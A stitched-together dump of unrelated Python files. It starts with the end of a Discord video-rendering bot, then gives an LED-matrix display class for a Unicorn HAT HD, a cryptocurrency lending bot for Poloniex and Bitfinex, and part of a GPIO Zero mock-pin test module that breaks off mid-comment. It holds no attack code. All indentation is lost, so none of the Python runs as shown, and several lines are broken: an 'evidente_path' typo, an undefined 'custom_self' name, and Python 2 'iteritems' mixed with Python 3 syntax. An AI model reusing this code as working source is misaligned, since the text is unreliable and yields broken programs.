`Your video is being generated... Done!`
`Video file too big for you server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server... Failed!`
"""
await render.updateFeedback(newFeedback)
exceptionEmbed = discord.Embed(description=exception, color=0xff0000)
exceptionMessage = await render.getContext().send(embed=exceptionEmbed)
addToDeletionQueue(exceptionMessage)
render.setState(State.DONE)
except Exception as exception:
print(f"Error: {exception}")
try:
render.setState(State.DONE)
except:
pass
finally:
if render.getState() == State.DONE:
clean(render.getMessages(), render.getOutputFilename())
addToDeletionQueue(render.getFeedbackMessage())
# Remove from queue if state is DONE
if renderQueueSize > 0:
for index in reversed(range(renderQueueSize)):
if renderQueue[index].getState() == State.DONE:
renderQueue.pop(index)
@courtBot.event
async def on_ready():
global currentActivityText
print("Bot is ready!")
print(f"Logged in as {courtBot.user.name}#{courtBot.user.discriminator} ({courtBot.user.id})")
currentActivityText = f"{prefix}help"
renderQueueLoop.start()
deletionQueueLoop.start()
def clean(thread: List[Comment], filename):
try:
os.remove(filename)
except Exception as exception:
print(f"Error: {exception}")
try:
for comment in thread:
if (comment.evidence_path is not None):
os.remove(comment.evidente_path)
except Exception as exception:
print(f"Error: {exception}")
def renderThread():
global renderQueue
while True:
time.sleep(2)
try:
for render in renderQueue:
if render.getState() == State.QUEUED:
render.setState(State.INPROGRESS)
try:
render_comment_list(render.getMessages(), render.getOutputFilename())
render.setState(State.RENDERED)
except Exception as exception:
print(f"Error: {exception}")
render.setState(State.FAILED)
finally:
break
except Exception as exception:
print(f"Error: {exception}")
backgroundThread = threading.Thread(target=renderThread, name="RenderThread")
backgroundThread.start()
# Even while threads in python are not concurrent in CPU, the rendering process may use a lot of disk I/O so having two threads
# May help speed up things
backgroundThread2 = threading.Thread(target=renderThread, name="RenderThread2")
backgroundThread2.start()
courtBot.run(token)
backgroundThread.join()
backgroundThread2.join()
|
ledhat.py
|
#!/usr/bin/env python3
# coding=utf8
import os
import time
import colorsys
import threading
import _thread
from sys import exit, argv
try:
from PIL import Image, ImageDraw, ImageFont
except ImportError:
exit('Lemon requires the pillow module\nInstall with: sudo pip3 install pillow')
try:
import unicornhathd as unicorn
print("unicorn hat hd detected")
except ImportError:
from unicorn_hat_sim import unicornhathd as unicorn
class LedHat:
def __init__(self):
self._lock_ui = _thread.allocate_lock()
unicorn.rotation(270)
unicorn.brightness(1)
self._unicorn_width, self._unicorn_height = unicorn.get_shape()
self._default_font_file = 'fonts/Hack-Regular.ttf'
self._default_font_size = 12
self._default_font = ImageFont.truetype(self._default_font_file, self._default_font_size)
def _animate_icon(self, image, repeat=3, cycle_time=0.10):
if image == None or type(image) is str == False:
print("Not a string:", image)
return
self._lock_ui.acquire()
for i in range(0, repeat):
# this is the original pimoroni function for drawing sprites
for o_x in range(int(image.size[0] / self._unicorn_width)):
for o_y in range(int(image.size[1] / self._unicorn_height)):
valid = False
for x in range(self._unicorn_width):
for y in range(self._unicorn_height):
pixel = image.getpixel(((o_x * self._unicorn_width) + y, (o_y * self._unicorn_height) + x))
r, g, b = int(pixel[0]), int(pixel[1]), int(pixel[2])
if r or g or b:
valid = True
unicorn.set_pixel((self._unicorn_height - y - 1), x, r, g, b)
if valid:
unicorn.show()
time.sleep(cycle_time)
unicorn.off()
self._lock_ui.release()
def _animate_text(self, line, cycle_time=0.10, font=None):
if line == None or type(line) is str == False:
print("Not a string:", line)
return
self._lock_ui.acquire()
text_font = self._default_font
if font != None:
# TODO: Check whether file exists
custom_self._default_font_file = 'fonts/' + font + '.ttf'
try:
text_font = ImageFont.truetype(custom_self._default_font_file, self._default_font_size)
except IOError:
text_font = self._default_font
text_width = self._unicorn_width
text_height = 0
text_x = self._unicorn_width
text_y = 2
w, h = text_font.getsize(line)
text_width += w + self._unicorn_width
text_height = max(text_height, h)
text_width += self._unicorn_width + text_x + 1
image = Image.new('RGB', (text_width, max(16, text_height)), (0, 0, 0))
draw = ImageDraw.Draw(image)
offset_left = 0
draw.text((text_x + offset_left, text_y), line, font=self._default_font, fill=(255,255,255,255))
offset_left += self._default_font.getsize(line)[0] + self._unicorn_width
for scroll in range(text_width - self._unicorn_width):
for x in range(self._unicorn_width):
for y in range(self._unicorn_height):
pixel = image.getpixel((x + scroll, y))
r, g, b = [int(n) for n in pixel]
unicorn.set_pixel(self._unicorn_width - 1 - x, y, r, g, b)
unicorn.show()
time.sleep(cycle_time / 5)
unicorn.off()
self._lock_ui.release()
def icon(self, name, repeat=3, cycle_time=0.10):
# TODO: Check whether file exists
img = Image.open('icons/' + name + '.png')
self._thread_icon = threading.Thread(target=self._animate_icon, args=(img,repeat,cycle_time,))
self._thread_icon.daemon = True
self._thread_icon.start()
time.sleep(.05)
def text(self, line, cycle_time=0.10, font=None):
self._thread_text = threading.Thread(target=self._animate_text, args=(line,cycle_time,font,))
self._thread_text.daemon = True
self._thread_text.start()
time.sleep(.05)
|
Lending.py
|
# coding=utf-8
from decimal import Decimal
import sched
import time
import threading
Config = None
api = None
log = None
Data = None
MaxToLend = None
Analysis = None
SATOSHI = Decimal(10) ** -8
sleep_time_active = 0
sleep_time_inactive = 0
sleep_time = 0
min_daily_rate = 0
max_daily_rate = 0
spread_lend = 0
gap_bottom_default = 0
gap_top_default = 0
xday_threshold = 0
xday_spread = 0
xdays = 0
min_loan_size = 0
min_loan_sizes = {}
end_date = None
coin_cfg = {}
dry_run = 0
transferable_currencies = []
currencies_to_analyse = []
keep_stuck_orders = True
hide_coins = True
coin_cfg_alerted = {}
max_active_alerted = {}
notify_conf = {}
loans_provided = {}
gap_mode_default = ""
scheduler = None
exchange = None
frrasmin = False
frrdelta = 0.0
# limit of orders to request
loanOrdersRequestLimit = {}
defaultLoanOrdersRequestLimit = 100
def init(cfg, api1, log1, data, maxtolend, dry_run1, analysis, notify_conf1):
global Config, api, log, Data, MaxToLend, Analysis, notify_conf
Config = cfg
api = api1
log = log1
Data = data
MaxToLend = maxtolend
Analysis = analysis
notify_conf = notify_conf1
global sleep_time, sleep_time_active, sleep_time_inactive, min_daily_rate, max_daily_rate, spread_lend, \
gap_bottom_default, gap_top_default, xday_threshold, xday_spread, xdays, min_loan_size, end_date, coin_cfg, \
min_loan_sizes, dry_run, transferable_currencies, keep_stuck_orders, hide_coins, scheduler, gap_mode_default, \
exchange, analysis_method, currencies_to_analyse, all_currencies, frrasmin, frrdelta
exchange = Config.get_exchange()
sleep_time_active = float(Config.get("BOT", "sleeptimeactive", None, 1, 3600))
sleep_time_inactive = float(Config.get("BOT", "sleeptimeinactive", None, 1, 3600))
exchangeMax = 7 if exchange == 'BITFINEX' else 5
min_daily_rate = Decimal(Config.get("BOT", "mindailyrate", None, 0.002, exchangeMax)) / 100
max_daily_rate = Decimal(Config.get("BOT", "maxdailyrate", None, 0.002, exchangeMax)) / 100
spread_lend = int(Config.get("BOT", "spreadlend", None, 1, 20))
gap_mode_default = Config.get_gap_mode("BOT", "gapMode")
gap_bottom_default = Decimal(Config.get("BOT", "gapbottom", None, 0))
gap_top_default = Decimal(Config.get("BOT", "gaptop", None, gap_bottom_default))
xday_threshold = float(Config.get("BOT", "xdaythreshold", None, 0.002, 5)) / 100
xday_spread = float(Config.get('BOT', 'xdayspread', 0, 0, 10))
maxPeriod = 120 if exchange == 'BITFINEX' else 60
xdays = str(Config.get("BOT", "xdays", None, 2, maxPeriod))
min_loan_size = Decimal(Config.get("BOT", 'minloansize', None, 0.01))
end_date = Config.get('BOT', 'endDate')
coin_cfg = Config.get_coin_cfg()
min_loan_sizes = Config.get_min_loan_sizes()
dry_run = dry_run1
transferable_currencies = Config.get_currencies_list('transferableCurrencies')
all_currencies = Config.get_all_currencies()
currencies_to_analyse = Config.get_currencies_list('analyseCurrencies', 'MarketAnalysis')
keep_stuck_orders = Config.getboolean('BOT', "keepstuckorders", True)
hide_coins = Config.getboolean('BOT', 'hideCoins', True)
frrasmin = Config.getboolean('BOT', 'frrasmin', False)
frrdelta = Decimal(Config.get('BOT', 'frrdelta', 0.0000))
analysis_method = Config.get('Daily_min', 'method', 'percentile')
if analysis_method not in ['percentile', 'MACD']:
raise ValueError("analysis_method: \"{0}\" is not valid, must be percentile or MACD".format(analysis_method))
sleep_time = sleep_time_active # Start with active mode
# create the scheduler thread
scheduler = sched.scheduler(time.time, time.sleep)
if notify_conf['notify_summary_minutes']:
# Wait 10 seconds before firing the first summary notifcation, then use the config time value for future updates
scheduler.enter(10, 1, notify_summary, (notify_conf['notify_summary_minutes'] * 60, ))
if notify_conf['notify_new_loans']:
scheduler.enter(20, 1, notify_new_loans, (60, ))
if not scheduler.empty():
t = threading.Thread(target=scheduler.run)
t.start()
def get_sleep_time():
return sleep_time
def set_sleep_time(usable):
global sleep_time
if usable == 0: # After loop, if no currencies had enough to lend, use inactive sleep time.
sleep_time = sleep_time_inactive
else: # Else, use active sleep time.
sleep_time = sleep_time_active
def notify_summary(sleep_time):
try:
log.notify(Data.stringify_total_lent(*Data.get_total_lent()), notify_conf)
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print("Error during summary notification: {0}".format(ex.message))
scheduler.enter(sleep_time, 1, notify_summary, (sleep_time, ))
def notify_new_loans(sleep_time):
global loans_provided
try:
new_provided = api.return_active_loans()['provided']
if loans_provided:
# function to return a set of ids from the api result
# get_id_set = lambda loans: set([x['id'] for x in loans])
def get_id_set(loans):
return set([x['id'] for x in loans])
loans_amount = {}
loans_info = {}
for loan_id in get_id_set(new_provided) - get_id_set(loans_provided):
loan = [x for x in new_provided if x['id'] == loan_id][0]
# combine loans with the same rate
k = 'c' + loan['currency'] + 'r' + loan['rate'] + 'd' + str(loan['duration'])
loans_amount[k] = float(loan['amount']) + (loans_amount[k] if k in loans_amount else 0)
loans_info[k] = loan
# send notifications with the grouped info
for k, amount in loans_amount.iteritems():
loan = loans_info[k]
t = "{0} {1} loan filled for {2} days at a rate of {3:.4f}%"
text = t.format(amount, loan['currency'], loan['duration'], float(loan['rate']) * 100)
log.notify(text, notify_conf)
loans_provided = new_provided
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
print("Error during new loans notification: {0}".format(ex.message))
scheduler.enter(sleep_time, 1, notify_new_loans, (sleep_time, ))
def get_min_loan_size(currency):
if currency not in min_loan_sizes:
return min_loan_size
return Decimal(min_loan_sizes[currency])
def create_lend_offer(currency, amt, rate):
days = '2'
if float(rate) > 0.0001:
rate = float(rate) - 0.000001 # lend offer just bellow the competing one
amt = "%.8f" % Decimal(amt)
if xday_threshold > 0:
if float(rate) >= xday_threshold:
days = xdays
elif xday_spread and xday_spread > 0:
xday_threshold_min = xday_threshold / xday_spread
if float(rate) > xday_threshold_min:
m = (float(xdays) - 2) / (xday_threshold - xday_threshold_min)
days = str(int(round(m * (float(rate) - xday_threshold_min) + 2)))
if Config.has_option('BOT', 'endDate'):
days_remaining = int(Data.get_max_duration(end_date, "order"))
if int(days_remaining) <= 2:
print("endDate reached. Bot can no longer lend.\nExiting...")
log.log("The end date has almost been reached and the bot can no longer lend. Exiting.")
log.refreshStatus(Data.stringify_total_lent(*Data.get_total_lent()), Data.get_max_duration(
end_date, "status"))
log.persistStatus()
exit(0)
if int(days) > days_remaining:
days = str(days_remaining)
if not dry_run:
msg = api.create_loan_offer(currency, amt, days, 0, rate)
if days == xdays and notify_conf['notify_xday_threshold']:
text = "{0} {1} loan placed for {2} days at a rate of {3:.4f}%".format(amt, currency, days, rate * 100)
log.notify(text, notify_conf)
log.offer(amt, currency, rate, days, msg)
def cancel_all():
loan_offers = api.return_open_loan_offers()
available_balances = api.return_available_account_balances('lending')
for CUR in loan_offers:
if CUR in coin_cfg and coin_cfg[CUR]['maxactive'] == 0:
# don't cancel disabled coin
continue
if keep_stuck_orders:
lending_balances = available_balances['lending']
if isinstance(lending_balances, dict) and CUR in lending_balances:
cur_sum = float(available_balances['lending'][CUR])
else:
cur_sum = 0
for offer in loan_offers[CUR]:
cur_sum += float(offer['amount'])
else:
cur_sum = float(get_min_loan_size(CUR)) + 1
if cur_sum >= float(get_min_loan_size(CUR)):
for offer in loan_offers[CUR]:
if not dry_run:
try:
msg = api.cancel_loan_offer(CUR, offer['id'])
log.cancelOrder(CUR, msg)
except Exception as ex:
ex.message = ex.message if ex.message else str(ex)
log.log("Error canceling loan offer: {0}".format(ex.message))
else:
print("Not enough " + CUR + " to lend if bot canceled open orders. Not cancelling.")
def lend_all():
total_lent = Data.get_total_lent()[0]
lending_balances = api.return_available_account_balances("lending")['lending']
if dry_run: # just fake some numbers, if dryrun (testing)
lending_balances = Data.get_on_order_balances()
# Fill the (maxToLend) balances on the botlog.json for display it on the web
for cur in sorted(total_lent):
if len(lending_balances) == 0 or cur not in lending_balances:
MaxToLend.amount_to_lend(total_lent[cur], cur, 0, 0)
usable_currencies = 0
global sleep_time # We need global var to edit sleeptime
if gap_mode_default == "rawbtc":
ticker = api.return_ticker() # Only call ticker once for all orders
else:
ticker = False
for cur1 in coin_cfg:
if "rawbtc" in cur1:
ticker = api.return_ticker()
break
try:
for cur in lending_balances:
if cur in all_currencies:
usable_currencies += lend_cur(cur, total_lent, lending_balances, ticker)
except StopIteration: # Restart lending if we stop to raise the request limit.
lend_all()
set_sleep_time(usable_currencies)
def get_frr_or_min_daily_rate(cur):
"""
Checks the Flash Return Rate of cur against the min daily rate and returns the better of the two. If not using
bitfinex then it will always return the min daily rate for the currency.
:param cur: The currency which to check
:return: The better of the two rates (FRR and min daily rate)
"""
if cur in coin_cfg:
min_daily_rate = Decimal(coin_cfg[cur]['minrate'])
frrasmin = coin_cfg[cur]['frrasmin']
frrdelta = Decimal(coin_cfg[cur]['frrdelta']) / 100
else:
min_daily_rate = Decimal(Config.get("BOT", "mindailyrate", None, 0.002, 5)) / 100
frrasmin = Config.getboolean('BOT', 'frrasmin', False)
frrdelta = Decimal(Config.get('BOT', 'frrdelta', 0.0000))
if exchange == 'BITFINEX' and frrasmin:
frr_rate = Decimal(api.get_frr(cur)) + frrdelta
if frr_rate > min_daily_rate:
log.log("Using FRR as mindailyrate {0}% for {1}".format(frr_rate * 100, cur))
return frr_rate
return min_daily_rate
def get_min_daily_rate(cur):
cur_min_daily_rate = get_frr_or_min_daily_rate(cur)
if cur in coin_cfg:
if coin_cfg[cur]['maxactive'] == 0:
if cur not in max_active_alerted: # Only alert once per coin.
max_active_alerted[cur] = True
log.log('maxactive amount for ' + cur + ' set to 0, won\'t lend.')
return False
if cur not in coin_cfg_alerted: # Only alert once per coin.
coin_cfg_alerted[cur] = True
log.log('Using custom mindailyrate ' + str(cur_min_daily_rate * 100) + '% for ' + cur)
if Analysis and cur in currencies_to_analyse:
recommended_min = Analysis.get_rate_suggestion(cur, method=analysis_method)
if cur_min_daily_rate < recommended_min:
log.log("Using {0} as mindailyrate {1}% for {2}".format(analysis_method, recommended_min * 100, cur))
cur_min_daily_rate = recommended_min
return Decimal(cur_min_daily_rate)
def construct_order_book(active_cur):
# make sure we have a request limit for this currency
if active_cur not in loanOrdersRequestLimit:
loanOrdersRequestLimit[active_cur] = defaultLoanOrdersRequestLimit
loans = api.return_loan_orders(active_cur, loanOrdersRequestLimit[active_cur])
if len(loans) == 0:
return False
rate_book = []
volume_book = []
for offer in loans['offers']:
rate_book.append(offer['rate'])
volume_book.append(offer['amount'])
return {'rates': rate_book, 'volumes': volume_book}
def get_gap_rate(active_cur, gap, order_book, cur_total_balance, raw=False):
if raw:
gap_expected = gap
else:
gap_expected = gap * cur_total_balance / Decimal(100.0)
gap_sum = 0
i = 0
while gap_sum < gap_expected:
if i == len(order_book['volumes']) - 1 and len(order_book['volumes']) == loanOrdersRequestLimit[active_cur]:
loanOrdersRequestLimit[active_cur] += defaultLoanOrdersRequestLimit
log.log(active_cur + ': Not enough offers in response, adjusting request limit to ' + str(
loanOrdersRequestLimit[active_cur]))
raise StopIteration
elif i == len(order_book['volumes']) - 1:
return max_daily_rate
gap_sum += float(order_book['volumes'][i])
i += 1
return Decimal(order_book['rates'][i])
def get_cur_spread(spread, cur_active_bal, active_cur):
cur_spread_lend = int(spread) # Checks if active_bal can't be spread that many times, and may go down to 1.
cur_min_loan_size = get_min_loan_size(active_cur)
while cur_active_bal < (cur_spread_lend * cur_min_loan_size):
cur_spread_lend -= 1
return int(cur_spread_lend)
def construct_orders(cur, cur_active_bal, cur_total_balance, ticker):
cur_spread = get_cur_spread(spread_lend, cur_active_bal, cur)
top_rate, bottom_rate = get_gap_mode_rates(cur, cur_active_bal, cur_total_balance, ticker)
gap_diff = top_rate - bottom_rate
if cur_spread == 1:
rate_step = 0
else:
rate_step = gap_diff / (cur_spread - 1)
order_rates = []
i = 0
while i < cur_spread:
new_rate = bottom_rate + (rate_step * i)
order_rates.append(new_rate)
i += 1
# Condensing and logic'ing time
for rate in order_rates:
if rate > max_daily_rate:
order_rates.remove(rate)
order_rates.append(max_daily_rate)
new_order_rates = sorted(list(set(order_rates)))
new_order_amounts = []
i = 0
while i < len(new_order_rates):
new_amount = Data.truncate(cur_active_bal / len(new_order_rates), 8)
new_order_amounts.append(Decimal(new_amount))
i += 1
remainder = cur_active_bal - sum(new_order_amounts)
if remainder > 0: # If truncating causes remainder, add that to first order.
new_order_amounts[0] += remainder
return {'amounts': new_order_amounts, 'rates': new_order_rates}
def get_gap_mode_rates(cur, cur_active_bal, cur_total_balance, ticker):
global gap_mode_default, gap_bottom_default, gap_top_default # To be able to change them later if needed.
gap_mode, gap_bottom, gap_top = gap_mode_default, gap_bottom_default, gap_top_default
use_gap_cfg = False
order_book = construct_order_book(cur)
if cur in coin_cfg: # Get custom values specific to coin
cfg = coin_cfg[cur]
if cfg.get('gapmode', False) and cfg.get('gapbottom', False) and cfg.get('gaptop', False):
# Only overwrite default if all three are set
use_gap_cfg = True
gap_mode = cfg['gapmode']
gap_bottom = cfg['gapbottom']
gap_top = cfg['gaptop']
if gap_mode == "rawbtc":
btc_value = 1
if cur != 'BTC':
for coin in ticker:
if coin == 'BTC_' + str(cur).upper():
btc_value = Decimal(ticker[coin]['last'])
break
bottom_depth = gap_bottom / btc_value # Converts from BTC to altcoin's value
bottom_rate = get_gap_rate(cur, bottom_depth, order_book, cur_total_balance, True)
top_depth = gap_top / btc_value
top_rate = get_gap_rate(cur, top_depth, order_book, cur_total_balance, True)
elif gap_mode == "raw": # Value stays in altcoin
bottom_rate = get_gap_rate(cur, gap_bottom, order_book, cur_total_balance, True)
top_rate = get_gap_rate(cur, gap_top, order_book, cur_total_balance, True)
elif gap_mode == "relative":
bottom_rate = get_gap_rate(cur, gap_bottom, order_book, cur_total_balance)
top_rate = get_gap_rate(cur, gap_top, order_book, cur_total_balance)
else:
if use_gap_cfg:
print(f'WARN: Invalid setting for gapMode for {cur}, using defaults...')
coin_cfg[cur]['gapmode'] = "rawbtc"
coin_cfg[cur]['gapbottom'] = 10
coin_cfg[cur]['gaptop'] = 100
else:
print("WARN: Invalid setting for gapMode, using defaults...")
gap_mode_default = "relative"
gap_bottom_default = 10
gap_top_default = 200
return get_gap_mode_rates(cur, cur_active_bal, cur_total_balance, ticker) # Start over with new defaults
return [Decimal(top_rate), Decimal(bottom_rate)]
def lend_cur(active_cur, total_lent, lending_balances, ticker):
active_cur_total_balance = Decimal(lending_balances[active_cur])
if active_cur in total_lent:
active_cur_total_balance += Decimal(total_lent[active_cur])
# min daily rate can be changed per currency
cur_min_daily_rate = get_min_daily_rate(active_cur)
# log total coin
log.updateStatusValue(active_cur, "totalCoins", (Decimal(active_cur_total_balance)))
order_book = construct_order_book(active_cur)
if not order_book or len(order_book['rates']) == 0 or not cur_min_daily_rate:
return 0
active_bal = MaxToLend.amount_to_lend(active_cur_total_balance, active_cur, Decimal(lending_balances[active_cur]),
Decimal(order_book['rates'][0]))
if float(active_bal) >= get_min_loan_size(active_cur): # Make sure sleeptimer is set to active if any cur can lend.
currency_usable = 1
else:
return 0 # Return early to end function.
orders = construct_orders(active_cur, active_bal, active_cur_total_balance, ticker) # Build all potential orders
i = 0
while i < len(orders['amounts']): # Iterate through prepped orders and create them if they work
below_min = Decimal(orders['rates'][i]) < Decimal(cur_min_daily_rate)
if hide_coins and below_min:
log.log("Not lending {:s} due to rate below {:.4f}% (actual: {:.4f}%)"
.format(active_cur, (cur_min_daily_rate * 100), (orders['rates'][i] * 100)))
return 0
elif below_min:
rate = str(cur_min_daily_rate)
else:
rate = orders['rates'][i]
try:
create_lend_offer(active_cur, orders['amounts'][i], rate)
except Exception as msg:
if "Amount must be at least " in str(msg):
import re
results = re.findall('[-+]?([0-9]*\.[0-9]+|[0-9]+)', str(msg))
for result in results:
if result:
min_loan_sizes[active_cur] = float(result)
log.log(active_cur + "'s min_loan_size has been increased to the detected min: " + result)
return lend_cur(active_cur, total_lent, lending_balances, ticker) # Redo cur with new min.
else:
raise msg
i += 1 # Finally, move to next order.
return currency_usable
def transfer_balances():
# Transfers all balances on the included list to Lending.
if len(transferable_currencies) > 0:
exchange_balances = api.return_balances() # This grabs only exchange balances.
for coin in transferable_currencies:
if coin in exchange_balances and Decimal(
exchange_balances[coin]) > 0:
msg = api.transfer_balance(coin, exchange_balances[coin], 'exchange', 'lending')
log.log(log.digestApiMsg(msg))
log.notify(log.digestApiMsg(msg), notify_conf)
if coin not in exchange_balances:
print("WARN: Incorrect coin entered for transferCurrencies: " + coin)
transferable_currencies.remove(coin)
|
mock.py
|
# vim: set fileencoding=utf-8:
#
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
#
# Copyright (c) 2016-2021 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2016 Andrew Scheller <github@loowis.durge.org>
#
# SPDX-License-Identifier: BSD-3-Clause
import os
from collections import namedtuple
from time import time, sleep, monotonic
from threading import Thread, Event
from math import isclose
import pkg_resources
from ..exc import (
PinPWMUnsupported,
PinSetInput,
PinFixedPull,
PinInvalidFunction,
PinInvalidPull,
PinInvalidBounce,
)
from ..devices import Device
from ..mixins import SharedMixin
from . import SPI
from .pi import PiPin, PiFactory
from .spi import SPISoftware
PinState = namedtuple('PinState', ('timestamp', 'state'))
class MockPin(PiPin):
"""
A mock pin used primarily for testing. This class does *not* support PWM.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self._function = 'input'
self._pull = 'up' if self.factory.pi_info.pulled_up(repr(self)) else 'floating'
self._state = self._pull == 'up'
self._bounce = None
self._edges = 'both'
self._when_changed = None
self.clear_states()
def close(self):
self.when_changed = None
self.function = 'input'
def _get_function(self):
return self._function
def _set_function(self, value):
if value not in ('input', 'output'):
raise PinInvalidFunction('function must be input or output')
self._function = value
if value == 'input':
# Drive the input to the pull
self._set_pull(self._get_pull())
def _get_state(self):
return self._state
def _set_state(self, value):
if self._function == 'input':
raise PinSetInput('cannot set state of pin {self!r}'.format(
self=self))
assert self._function == 'output'
assert 0 <= value <= 1
self._change_state(bool(value))
def _change_state(self, value):
if self._state != value:
t = monotonic()
self._state = value
self.states.append(PinState(t - self._last_change, value))
self._last_change = t
return True
return False
def _get_frequency(self):
return None
def _set_frequency(self, value):
if value is not None:
raise PinPWMUnsupported()
def _get_pull(self):
return self._pull
def _set_pull(self, value):
if self.function != 'input':
raise PinFixedPull(
'cannot set pull on non-input pin {self!r}'.format(self=self))
if value != 'up' and self.factory.pi_info.pulled_up(repr(self)):
raise PinFixedPull(
'{self!r} has a physical pull-up resistor'.format(self=self))
if value not in ('floating', 'up', 'down'):
raise PinInvalidPull('pull must be floating, up, or down')
self._pull = value
if value == 'up':
self.drive_high()
elif value == 'down':
self.drive_low()
def _get_bounce(self):
return self._bounce
def _set_bounce(self, value):
# XXX Need to implement this
if value is not None:
try:
value = float(value)
except ValueError:
raise PinInvalidBounce('bounce must be None or a float')
self._bounce = value
def _get_edges(self):
return self._edges
def _set_edges(self, value):
assert value in ('none', 'falling', 'rising', 'both')
self._edges = value
def _disable_event_detect(self):
pass
def _enable_event_detect(self):
pass
def _call_when_changed(self):
super()._call_when_changed(self._last_change, self._state)
def drive_high(self):
assert self._function == 'input'
if self._change_state(True):
if self._edges in ('both', 'rising') and self._when_changed is not None:
self._call_when_changed()
def drive_low(self):
assert self._function == 'input'
if self._change_state(False):
if self._edges in ('both', 'falling') and self._when_changed is not None:
self._call_when_changed()
def clear_states(self):
self._last_change = monotonic()
self.states = [PinState(0.0, self._state)]
def assert_states(self, expected_states):
# Tests that the pin went through the expected states (a list of values)
for actual, expected in zip(self.states, expected_states):
assert actual.state == expected
def assert_states_and_times(self, expected_states):
# Tests that the pin went through the expected states at the expected
# times (times are compared with a tolerance of tens-of-milliseconds as
# that's about all we can reasonably expect in a non-realtime
# environment on a Pi 1)
for actual, expected in zip(self.states, expected_states):
assert isclose(actual.timestamp, expected[0], rel_tol=0.05, abs_tol=0.05)
assert isclose(actual.state, expected[1])
class MockConnectedPin(MockPin):
"""
This derivative of :class:`MockPin` emulates a pin connected to another
mock pin. This is used in the "real pins" portion of the test suite to
check that one pin can influence another.
"""
def __init__(self, factory, number, input_pin=None):
super().__init__(factory, number)
self.input_pin = input_pin
def _change_state(self, value):
if self.input_pin:
if value:
self.input_pin.drive_high()
else:
self.input_pin.drive_low()
return super()._change_state(value)
class MockChargingPin(MockPin):
"""
This derivative of :class:`MockPin` emulates a pin which, when set to
input, waits a predetermined length of time and then drives itself high
(as if attached to, e.g. a typical circuit using an LDR and a capacitor
to time the charging rate).
"""
def __init__(self, factory, number, charge_time=0.01):
super().__init__(factory, number)
self.charge_time = charge_time # dark charging time
self._charge_stop = Event()
self._charge_thread = None
def _set_function(self, value):
super()._set_function(value)
if value == 'input':
if self._charge_thread:
self._charge_stop.set()
self._charge_thread.join()
self._charge_stop.clear()
self._charge_thread = Thread(target=self._charge)
self._charge_thread.start()
elif value == 'output':
if self._charge_thread:
self._charge_stop.set()
self._charge_thread.join()
else:
assert False
def _charge(self):
if not self._charge_stop.wait(self.charge_time):
try:
self.drive_high()
except AssertionError: # pragma: no cover
# Charging pins are typically flipped between input and output
# repeatedly; if another thread has already flipped us to
# output ignore the assertion-error resulting from attempting
# to drive the pin high
pass
class MockTriggerPin(MockPin):
"""
This derivative of :class:`MockPin` is intended to be used with another
:class:`MockPin` to emulate a distance sensor. Set *echo_pin* to the
corresponding pin instance. When this pin is driven high it will trigger
the echo pin to drive high for the echo time.
"""
def __init__(self, factory, number, echo_pin=None, echo_time=0.04):
super().__init__(factory, number)
self.echo_pin = echo_pin
self.echo_time = echo_time # longest echo time
self._echo_thread = None
def _set_state(self, value):
super()._set_state(value)
if value:
if self._echo_thread:
self._echo_thread.join()
self._echo_thread = Thread(target=self._echo)
self._echo_thread.start()
def _echo(self):
sleep(0.001)
self.echo_pin.drive_high()
sleep(self.echo_time)
self.echo_pin.drive_low()
class MockPWMPin(MockPin):
"""
This derivative of :class:`MockPin` adds PWM support.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self._frequency = None
def close(self):
self.frequency = None
super().close()
def _set_state(self, value):
if self._function == 'input':
raise PinSetInput(
'cannot set state of pin {self!r}'.format(self=self))
assert self._function == 'output'
assert 0 <= value <= 1
self._change_state(float(value))
def _get_frequency(self):
return self._frequency
def _set_frequency(self, value):
if value is not None:
assert self._function == 'output'
self._frequency = value
if value is None:
self._change_state(0.0)
class MockSPIClockPin(MockPin):
"""
This derivative of :class:`MockPin` is intended to be used as the clock pin
of a mock SPI device. It is not intended for direct construction in tests;
rather, construct a :class:`MockSPIDevice` with various pin numbers, and
this class will be used for the clock pin.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self.spi_devices = getattr(self, 'spi_devices', [])
def _set_state(self, value):
super()._set_state(value)
for dev in self.spi_devices:
dev.on_clock()
class MockSPISelectPin(MockPin):
"""
This derivative of :class:`MockPin` is intended to be used as the select
pin of a mock SPI device. It is not intended for direct construction in
tests; rather, construct a :class:`MockSPIDevice` with various pin numbers,
and this class will be used for the select pin.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self.spi_device = getattr(self, 'spi_device', None)
def _set_state(self, value):
super()._set_state(value)
if self.spi_device:
self.spi_device.on_select()
class MockSPIDevice:
"""
This class is used to test :class:`SPIDevice` implementations. It can be
used to mock up the slave side of simple SPI devices, e.g. the MCP3xxx
series of ADCs.
Descendants should override the :meth:`on_start` and/or :meth:`on_bit`
methods to respond to SPI interface events. The :meth:`rx_word` and
:meth:`tx_word` methods can be used facilitate communications within these
methods. Such descendents can then be passed as the *spi_class* parameter
of the :class:`MockFactory` constructor to have instances attached to any
SPI interface requested by an :class:`SPIDevice`.
"""
def __init__(self, clock_pin, mosi_pin=None, miso_pin=None,
select_pin=None, *, clock_polarity=False, clock_phase=False,
lsb_first=False, bits_per_word=8, select_high=False,
pin_factory=None):
if pin_factory is None:
pin_factory = Device.pin_factory
assert isinstance(pin_factory, MockFactory)
self.clock_pin = pin_factory.pin(clock_pin, pin_class=MockSPIClockPin)
self.mosi_pin = None if mosi_pin is None else pin_factory.pin(mosi_pin)
self.miso_pin = None if miso_pin is None else pin_factory.pin(miso_pin)
self.select_pin = None if select_pin is None else pin_factory.pin(select_pin, pin_class=MockSPISelectPin)
self.clock_polarity = clock_polarity
self.clock_phase = clock_phase
self.lsb_first = lsb_first
self.bits_per_word = bits_per_word
self.select_high = select_high
self.rx_bit = 0
self.rx_buf = []
self.tx_buf = []
self.clock_pin.spi_devices.append(self)
self.select_pin.spi_device = self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def close(self):
if self in self.clock_pin.spi_devices:
self.clock_pin.spi_devices.remove(self)
if self.select_pin is not None:
self.select_pin.spi_device = None
def on_select(self):
if self.select_pin.state == self.select_high:
self.on_start()
def on_clock(self):
# Don't do anything if this SPI device isn't currently selected
if self.select_pin is None or self.select_pin.state == self.select_high:
# The XOR of the clock pin's values, polarity and phase indicates
